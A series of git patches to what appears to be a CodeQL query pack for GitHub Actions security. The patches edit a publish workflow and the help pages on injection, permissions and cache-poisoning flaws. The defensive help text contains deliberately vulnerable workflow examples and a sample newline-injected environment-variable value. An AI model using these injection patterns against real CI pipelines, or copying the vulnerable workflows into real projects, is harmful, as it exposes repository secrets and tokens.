+on: + workflow_dispatch: + +jobs: + tests: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + - name: Fetch CodeQL + shell: bash + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + gh extension install github/gh-codeql + gh codeql set-channel "nightly" + gh codeql version + printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" + - name: Publish + env: + GITHUB_TOKEN: ${{ secrets.GHCR_TOKEN }} + run: | + codeql pack publish ql/lib + codeql pack publish ql/src From 2b8169b000780fd82fd69bccc460e10db0160cd1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:37:52 +0200 Subject: [PATCH 472/707] Update publish.yml --- .github/workflows/publish.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index 390d68453454..b09112f2fdd4 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ -18,6 +18,14 @@ jobs: printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" + - name: Install Packs + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + gh repo clone github/codeql + codeql pack install "ql/lib" + codeql pack install "ql/src" + codeql pack install "ql/test" - name: Publish env: GITHUB_TOKEN: ${{ secrets.GHCR_TOKEN }} From 23754b6d2f7868fdde57588f38cb8ad58547ce3f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:38:57 +0200 Subject: [PATCH 473/707] Update publish.yml --- .github/workflows/publish.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index b09112f2fdd4..bfe87d1056c4 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ -3,7 +3,7 @@ on: workflow_dispatch: jobs: - tests: + publish: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 From cc6badaea6fd22a4074da7e2f0717ff75ad28f0b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Sat, 10 Aug 2024 09:54:23 +0000 Subject: [PATCH 474/707] grammar --- ql/src/Security/CWE-077/EnvPathInjectionCritical.md | 2 +- ql/src/Security/CWE-077/EnvPathInjectionMedium.md | 2 +- ql/src/Security/CWE-077/EnvVarInjectionCritical.md | 2 +- ql/src/Security/CWE-077/EnvVarInjectionMedium.md | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md index 1891d41fa394..88cc06de90a4 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md @@ -2,7 +2,7 @@ ## Description -GitHub Actions allows to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. +GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. ```bash echo "$HOME/.local/bin" >> $GITHUB_PATH diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md index 1891d41fa394..88cc06de90a4 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md @@ -2,7 +2,7 @@ ## Description -GitHub Actions allows to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. +GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. ```bash echo "$HOME/.local/bin" >> $GITHUB_PATH diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md index 1d33a014d4b4..a16b41e3970d 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md @@ -2,7 +2,7 @@ ## Description -GitHub Actions allows to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: +GitHub Actions allow to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: This file should lines in the `KEY=VALUE` format: diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md index 1d33a014d4b4..a16b41e3970d 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md @@ -2,7 +2,7 @@ ## Description -GitHub Actions allows to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: +GitHub Actions allow to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: This file should lines in the `KEY=VALUE` format: From 77ecca9f5e8951d26f9d7bfde8f3b8f1b11b0bc2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Sat, 10 Aug 2024 10:17:40 +0000 Subject: [PATCH 475/707] grammar --- ql/src/Security/CWE-077/EnvPathInjectionCritical.md | 8 +++++--- ql/src/Security/CWE-077/EnvPathInjectionMedium.md | 8 +++++--- 2 files changed, 10 insertions(+), 6 deletions(-) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md index 88cc06de90a4..ae9afbb76f45 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md @@ -2,17 +2,19 @@ ## Description -GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. +GitHub Actions allow to define the system PATH variable by writing to a file pointed by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. + +E.g.: ```bash echo "$HOME/.local/bin" >> $GITHUB_PATH ``` -If an attacker can control the contents of the path being assigned to the system PATH, they will be able to influence what commands are run in subsequen steps of the same job. +If an attacker can control the contents of the system PATH, they are able to influence what commands are run in subsequent steps of the same job. ## Recommendations -- Do Not Allow Untrusted Data to Influence The System PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. +Do not allow untrusted data to influence the system PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. ## Examples diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md index 88cc06de90a4..ae9afbb76f45 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md @@ -2,17 +2,19 @@ ## Description -GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. +GitHub Actions allow to define the system PATH variable by writing to a file pointed by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. + +E.g.: ```bash echo "$HOME/.local/bin" >> $GITHUB_PATH ``` -If an attacker can control the contents of the path being assigned to the system PATH, they will be able to influence what commands are run in subsequen steps of the same job. +If an attacker can control the contents of the system PATH, they are able to influence what commands are run in subsequent steps of the same job. ## Recommendations -- Do Not Allow Untrusted Data to Influence The System PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. +Do not allow untrusted data to influence the system PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. ## Examples From a282818272a8312dbe8a97725c5c04dd5f4f46d0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Sat, 10 Aug 2024 10:52:06 +0000 Subject: [PATCH 476/707] grammar --- .../CWE-077/EnvPathInjectionCritical.md | 2 +- .../CWE-077/EnvPathInjectionMedium.md | 2 +- .../CWE-077/EnvVarInjectionCritical.md | 58 +++++++++---------- .../Security/CWE-077/EnvVarInjectionMedium.md | 58 +++++++++---------- 4 files changed, 60 insertions(+), 60 deletions(-) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md index ae9afbb76f45..436cf6859964 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md @@ -2,7 +2,7 @@ ## Description -GitHub Actions allow to define the system PATH variable by writing to a file pointed by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. +GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g.: diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md index ae9afbb76f45..436cf6859964 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md @@ -2,7 +2,7 @@ ## Description -GitHub Actions allow to define the system PATH variable by writing to a file pointed by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. +GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g.: diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md index a16b41e3970d..cc35402b804d 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md @@ -2,9 +2,9 @@ ## Description -GitHub Actions allow to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: +GitHub Actions allow to define environment variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: -This file should lines in the `KEY=VALUE` format: +This file contains lines in the `KEY=VALUE` format: ```bash steps: @@ -14,7 +14,7 @@ steps: echo "action_state=yellow" >> "$GITHUB_ENV" ``` -It is also possible to define a multiline variables by using the following format: +It is also possible to define multiline variables by using the [following construct](https://en.wikipedia.org/wiki/Here_document): ``` KEY<<{delimiter} @@ -35,40 +35,40 @@ steps: } >> "$GITHUB_ENV" ``` -If an attacker can control the contents of the values assigned to these variables and these are not properly sanitized, they will be able to inject additional variables by injecting new lines or `{delimiters}`. +If an attacker can control the values assigned to environment variables and there is no sanitization in place, the attacker will be able to inject additional variables by injecting new lines or `{delimiters}`. ## Recommendations -1. **Do Not Allow Untrusted Data to Influence Environment Variables**: +1. **Do not allow untrusted data to influence environment variables**: -- Avoid using untrusted data sources (e.g., artifact content) to define environment variables. -- Validate and sanitize all inputs before using them in environment settings. + - Avoid using untrusted data sources (e.g., artifact content) to define environment variables. + - Validate and sanitize all inputs before using them in environment settings. -2. **Do Not Allow New Lines When Defining Single Line Environment Variables**: +2. **Do not allow new lines when defining single line environment variables**: -- `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` + - `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` -3. **Use Unique Identifiers When Defining Multi Line Environment Variables**: +3. **Use unique identifiers when defining multi line environment variables**: -```bash -steps: - - name: Set the value in bash - id: step_one - run: | - # Generate a UUID - UUID=$(uuidgen) - { - echo "JSON_RESPONSE<> "$GITHUB_ENV" -``` + ```bash + steps: + - name: Set the value in bash + id: step_one + run: | + # Generate a UUID + UUID=$(uuidgen) + { + echo "JSON_RESPONSE<> "$GITHUB_ENV" + ``` ## Examples ### Example of Vulnerability -Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: +Consider the following basic setup where an environment variable `MYVAR` is set and used in subsequent steps: ```yaml steps: @@ -78,17 +78,17 @@ steps: BODY: ${{ github.event.comment.body }} run: | REPLACED=$(echo "$BODY" | sed 's/FOO/BAR/g') - echo "BODY=$REPLACED" >> "$GITHUB_ENV" + echo "MYVAR=$REPLACED" >> "$GITHUB_ENV" ``` -If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially inject new Environment variables. For example, they could write an Issue comment like: +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, the attacker can potentially inject new environment variables. For example, they could write an issue comment like: -``` +```text FOO NEW_ENV_VAR=MALICIOUS_VALUE ``` -Likewise, if the attacker controls a file in the Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact), and the contents of that file are assigned to an environment variable such as: +Likewise, if the attacker controls a file in the GitHub Actions Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact) and the contents of that file are assigned to an environment variable such as: ```bash - run: | @@ -109,7 +109,7 @@ An attacker could craft a malicious artifact that writes dangerous environment v ### Exploitation -An attacker will be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. +An attacker is be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. ## References diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md index a16b41e3970d..cc35402b804d 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md @@ -2,9 +2,9 @@ ## Description -GitHub Actions allow to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: +GitHub Actions allow to define environment variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: -This file should lines in the `KEY=VALUE` format: +This file contains lines in the `KEY=VALUE` format: ```bash steps: @@ -14,7 +14,7 @@ steps: echo "action_state=yellow" >> "$GITHUB_ENV" ``` -It is also possible to define a multiline variables by using the following format: +It is also possible to define multiline variables by using the [following construct](https://en.wikipedia.org/wiki/Here_document): ``` KEY<<{delimiter} @@ -35,40 +35,40 @@ steps: } >> "$GITHUB_ENV" ``` -If an attacker can control the contents of the values assigned to these variables and these are not properly sanitized, they will be able to inject additional variables by injecting new lines or `{delimiters}`. +If an attacker can control the values assigned to environment variables and there is no sanitization in place, the attacker will be able to inject additional variables by injecting new lines or `{delimiters}`. ## Recommendations -1. **Do Not Allow Untrusted Data to Influence Environment Variables**: +1. **Do not allow untrusted data to influence environment variables**: -- Avoid using untrusted data sources (e.g., artifact content) to define environment variables. -- Validate and sanitize all inputs before using them in environment settings. + - Avoid using untrusted data sources (e.g., artifact content) to define environment variables. + - Validate and sanitize all inputs before using them in environment settings. -2. **Do Not Allow New Lines When Defining Single Line Environment Variables**: +2. **Do not allow new lines when defining single line environment variables**: -- `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` + - `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` -3. **Use Unique Identifiers When Defining Multi Line Environment Variables**: +3. **Use unique identifiers when defining multi line environment variables**: -```bash -steps: - - name: Set the value in bash - id: step_one - run: | - # Generate a UUID - UUID=$(uuidgen) - { - echo "JSON_RESPONSE<> "$GITHUB_ENV" -``` + ```bash + steps: + - name: Set the value in bash + id: step_one + run: | + # Generate a UUID + UUID=$(uuidgen) + { + echo "JSON_RESPONSE<> "$GITHUB_ENV" + ``` ## Examples ### Example of Vulnerability -Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: +Consider the following basic setup where an environment variable `MYVAR` is set and used in subsequent steps: ```yaml steps: @@ -78,17 +78,17 @@ steps: BODY: ${{ github.event.comment.body }} run: | REPLACED=$(echo "$BODY" | sed 's/FOO/BAR/g') - echo "BODY=$REPLACED" >> "$GITHUB_ENV" + echo "MYVAR=$REPLACED" >> "$GITHUB_ENV" ``` -If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially inject new Environment variables. For example, they could write an Issue comment like: +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, the attacker can potentially inject new environment variables. For example, they could write an issue comment like: -``` +```text FOO NEW_ENV_VAR=MALICIOUS_VALUE ``` -Likewise, if the attacker controls a file in the Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact), and the contents of that file are assigned to an environment variable such as: +Likewise, if the attacker controls a file in the GitHub Actions Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact) and the contents of that file are assigned to an environment variable such as: ```bash - run: | @@ -109,7 +109,7 @@ An attacker could craft a malicious artifact that writes dangerous environment v ### Exploitation -An attacker will be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. +An attacker is be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. ## References From e83841bba9a3be69d0c14aa4f6e9fb59ad65dae6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Mon, 12 Aug 2024 09:29:26 +0000 Subject: [PATCH 477/707] fixes --- .../CWE-088/ArgumentInjectionCritical.md | 2 +- .../CWE-088/ArgumentInjectionMedium.md | 2 +- .../Security/CWE-094/CodeInjectionCritical.md | 4 +- .../Security/CWE-094/CodeInjectionMedium.md | 4 +- .../CWE-275/MissingActionsPermissions.md | 5 +- .../Security/CWE-285/ImproperAccessControl.md | 11 +-- .../CWE-349/CachePoisoningViaCodeInjection.md | 20 +++--- .../CWE-349/CachePoisoningViaDirectCache.md | 53 ++++++++++---- .../CachePoisoningViaPoisonableStep.md | 22 +++--- .../UntrustedCheckoutTOCTOUCritical.md | 72 +------------------ .../CWE-367/UntrustedCheckoutTOCTOUMedium.md | 72 +------------------ .../CWE-571/ExpressionIsAlwaysTrue.md | 58 +++++++-------- .../CWE-829/ArtifactPoisoningCritical.md | 6 +- .../CWE-829/ArtifactPoisoningMedium.md | 6 +- .../CWE-829/UntrustedCheckoutCritical.md | 6 +- .../Security/CWE-829/UntrustedCheckoutHigh.md | 6 +- .../CWE-829/UntrustedCheckoutMedium.md | 6 +- 17 files changed, 126 insertions(+), 229 deletions(-) diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md index 00dc3bad472b..4957297be92a 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md @@ -4,7 +4,7 @@ Passing user-controlled arguments to certain commands in the context of `Run` steps may lead to arbitrary code execution. -Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. +Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing the attacker to make changes to the repository. ## Recommendations diff --git a/ql/src/Security/CWE-088/ArgumentInjectionMedium.md b/ql/src/Security/CWE-088/ArgumentInjectionMedium.md index 00dc3bad472b..4957297be92a 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionMedium.md +++ b/ql/src/Security/CWE-088/ArgumentInjectionMedium.md @@ -4,7 +4,7 @@ Passing user-controlled arguments to certain commands in the context of `Run` steps may lead to arbitrary code execution. -Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. +Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing the attacker to make changes to the repository. ## Recommendations diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.md b/ql/src/Security/CWE-094/CodeInjectionCritical.md index cc85f68fb0d2..f2e494468112 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.md +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.md @@ -4,7 +4,7 @@ Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. -Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. +Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing an attacker to make changes to the repository. ## Recommendations @@ -16,7 +16,7 @@ It is also recommended to limit the permissions of any tokens used by a workflow ### Incorrect Usage -The following example lets a user inject an arbitrary shell command: +The following example lets attackers inject an arbitrary shell command: ```yaml on: issue_comment diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.md b/ql/src/Security/CWE-094/CodeInjectionMedium.md index cc85f68fb0d2..f2e494468112 100644 --- a/ql/src/Security/CWE-094/CodeInjectionMedium.md +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.md @@ -4,7 +4,7 @@ Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. -Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. +Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing an attacker to make changes to the repository. ## Recommendations @@ -16,7 +16,7 @@ It is also recommended to limit the permissions of any tokens used by a workflow ### Incorrect Usage -The following example lets a user inject an arbitrary shell command: +The following example lets attackers inject an arbitrary shell command: ```yaml on: issue_comment diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.md b/ql/src/Security/CWE-275/MissingActionsPermissions.md index 31ddab5329d3..9385759dae95 100644 --- a/ql/src/Security/CWE-275/MissingActionsPermissions.md +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.md @@ -2,12 +2,11 @@ ## Description -A GitHub Actions job or workflow hasn't set explicit permissions to restrict privileges to the workflow job. -A workflow job by default without the `permissions` key or a root workflow `permissions` will run with the default permissions defined at the repository level. For organizations created before February 2023, including many significant OSS projects and corporations, the default permissions grant read-write access to repositories, and new repositories inherit these old, insecure permissions. +If a GitHub Actions job or workflow has no explicit permissions set, then the repository permissions are used. Repositories created under organizations inherit the organization permissions. The organizations or repositories created before February 2023 have the default permissions set to read-write. Often these permissions do not adhere to the principle of least privilege and can be reduced to read-only, leaving the `write` permission only to a specific types as `issues: write` or `pull-requests: write`. ## Recommendations -Add the `permissions` key to the job or workflow (applied to all jobs) and set the permissions to the least privilege required to complete the task: +Add the `permissions` key to the job or the root of workflow (in this case it is applied to all jobs in the workflow that do not have their own `permissions` key) and assign the least privileges required to complete the task: ```yaml name: "My workflow" diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.md b/ql/src/Security/CWE-285/ImproperAccessControl.md index c517ff98e585..594f381d8ce0 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.md +++ b/ql/src/Security/CWE-285/ImproperAccessControl.md @@ -2,17 +2,20 @@ ## Description -An authorization check may not be properly implemented, allowing an attacker to mutate the code after it has been reviewed. +Sometimes labels are used to approve GitHub Actions. An authorization check may not be properly implemented, allowing an attacker to mutate the code after it has been reviewed and approved by label. ## Recommendations -When using Label gates, make sure that the code cannot be modified after it has been reviewed and the label has been set. +When using labels, make sure that the code cannot be modified after it has been reviewed and the label has been set. ## Examples ### Incorrect Usage -The following example shows a job that requires the label `safe to test` to be set before running untrusted code. However, the workflow gets triggered on `synchronize` activity type and, therefore, it will get triggered every time there is a change in the Pull Request. An attacker can modify the code of the Pull Request after the code has been reviewed and the label has been set. +The following example shows a job that requires the label `safe to test` to be set before running untrusted code. There are two problems with the code: + +1. The workflow gets triggered on `synchronize` activity type and, therefore, it will get triggered every time there is a change in the Pull Request. An attacker can modify the code of the Pull Request after the code has been reviewed and the label has been set. The workflow will be triggered every time a new change is added to the Pull Request. +2. The workflow uses `ref: ${{ github.event.pull_request.head.ref }}` for checkout, which is a branch name of the Pull Request. There is a window of opportunity for the attacker to modify their branch after the Pull Request is labeled, but before the workflow starts and runs the checkout. ```yaml on: @@ -33,7 +36,7 @@ jobs: ### Correct Usage -Make sure that the workflow only gets triggered when the label is set and use an inmutable commit (`github.event.pull_request.head.sha`) instead of a mutable reference. +Make sure that the workflow only gets triggered when the label is set and use an immutable commit (`github.event.pull_request.head.sha`) instead of a mutable reference. ```yaml on: diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md index fb927f97c68b..667c41dc153e 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md @@ -2,14 +2,14 @@ ## Description -GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows. +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache from unprivileged workflow, potentially leading to code execution in privileged workflows. An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: -1. Steal the cache access token and URL -2. Fill the cache to trigger eviction of legitimate entries -3. Poison cache entries with malicious payloads -4. Achieve code execution in privileged workflows that restore the poisoned cache +1. Steal the cache access token and URL. +2. Overflow the cache to trigger eviction of legitimate entries. +3. Poison cache entries with malicious payloads. +4. Achieve code execution in privileged workflows that restore the poisoned cache. This allows lateral movement from low-privileged to high-privileged workflows within a repository. @@ -27,11 +27,11 @@ Due to the above design, if something is cached in the context of the default br 1. Avoid using caching in workflows that handle sensitive operations like releases. 2. If caching must be used: - - Validate restored cache contents before use - - Use short-lived, workflow-specific cache keys - - Clear caches regularly -3. Implement strict isolation between untrusted and privileged workflow execution: -4. Never run untrusted code in the context of the default branch + - Validate restored cache contents before use. + - Use short-lived, workflow-specific cache keys. + - Clear caches regularly. +3. Implement strict isolation between untrusted and privileged workflow execution. +4. Never run untrusted code in the context of the default branch. 5. Sign the cache value cryptographically and verify the signature before usage. ## Examples diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md index c3c5970c37f5..c12fb7998929 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md @@ -2,14 +2,14 @@ ## Description -GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows. +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache from unprivileged workflow, potentially leading to code execution in privileged workflows. An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: -1. Steal the cache access token and URL -2. Fill the cache to trigger eviction of legitimate entries -3. Poison cache entries with malicious payloads -4. Achieve code execution in privileged workflows that restore the poisoned cache +1. Steal the cache access token and URL. +2. Overflow the cache to trigger eviction of legitimate entries. +3. Poison cache entries with malicious payloads. +4. Achieve code execution in privileged workflows that restore the poisoned cache. This allows lateral movement from low-privileged to high-privileged workflows within a repository. @@ -27,11 +27,11 @@ Due to the above design, if something is cached in the context of the default br 1. Avoid using caching in workflows that handle sensitive operations like releases. 2. If caching must be used: - - Validate restored cache contents before use - - Use short-lived, workflow-specific cache keys - - Clear caches regularly -3. Implement strict isolation between untrusted and privileged workflow execution: -4. Never run untrusted code in the context of the default branch + - Validate restored cache contents before use. + - Use short-lived, workflow-specific cache keys. + - Clear caches regularly. +3. Implement strict isolation between untrusted and privileged workflow execution. +4. Never run untrusted code in the context of the default branch. 5. Sign the cache value cryptographically and verify the signature before usage. ## Examples @@ -69,13 +69,12 @@ jobs: ### Correct Usage -The following workflow is not checking out untrusted files and, therefore, is caching trusted files only. +The following workflow checking out untrusted files, but the cache is scoped to the Pull Request. ```yaml name: Secure Workflow on: - issue_comment: - types: [created] + pull_request: jobs: pr-comment: @@ -94,6 +93,34 @@ jobs: restore-keys: ${{ runner.os }}-pip- ``` +Note, that the example above doesn't allow using secrets if the Pull Request originates from a fork. In case secrets are needed, `pull_request_target` with labels as `safe to test` can be used, but the code in Pull Request must be manually reviewed before applying the label. + +```yaml +name: Secure Workflow +on: + pull_request_target: + types: [labeled] + +jobs: + pr-comment: + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha}} + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ~/.cache/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- +``` + ## References - [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md 